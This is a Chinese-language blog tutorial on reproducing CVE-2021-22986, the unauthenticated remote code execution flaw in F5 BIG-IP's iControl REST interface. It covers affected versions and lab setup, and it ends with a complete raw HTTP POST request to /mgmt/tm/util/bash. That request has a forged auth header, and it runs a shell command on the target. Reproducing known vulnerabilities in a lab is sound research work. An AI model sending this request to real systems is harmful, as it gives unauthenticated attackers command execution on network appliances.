如何复现F5BIG-IP远程代码执行漏洞CVE-2021-22986

来源：恒创科技编辑：恒创科技编辑部

2023-12-02 18:06:59

本篇文章为大家展示了如何复现F5 BIG-IP远程代码执行漏洞CVE-2021-22986，内容简明扼要并且容易理解，绝对能使你眼前一亮，通过这篇文章的详细介绍希望你能有所收获。

0x01 漏洞描述

F5 BIG-IP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。

CVE-2021-22986 该漏洞允许未经身份验证的攻击者，通过BIG-IP管理界面和自身IP地址对iControl REST接口进行网络访问，以执行任意系统命令，创建或删除文件以及禁用服务。

0x02 漏洞影响

F5 BIG-IP 16.0.0-16.0.1F5 BIG-IP 12.1.0-12.1.5.2F5 BIG-IP 15.1.0-15.1.2F5 BIG-IQ 7.1.0-7.1.0.2F5 BIG-IP 14.1.0-14.1.3.1F5 BIG-IQ 7.0.0-7.0.0.1F5 BIG-IP 13.1.0-13.1.3.5F5 BIG-IQ 6.0.0-6.1.0

0x03 漏洞复现

https://login.f5.com/resource/registerEmail.do注册好后，下载

https://downloads.f5.com/esd/eula.sv?sw=BIG-IP&pro=big-ip_v16.x&ver=16.0.1&container=16.0.1_Virtual-Edition&path=&file=&B1=I+Accept选择ova格式的，可以快速使用vm虚拟机打开，安装完后，用户名：root，密码：default，成功登陆后，输入config输入config ，几次回车即可看到当前ip，访问

3.1 使用POC攻击

POST /mgmt/tm/util/bash HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeAuthorization: Basic YWRtaW46QVNhc1M=X-F5-Auth-Token: Host: 192.168.1.191Content-Length: 39{"command":"run","utilCmdArgs":"-c id"}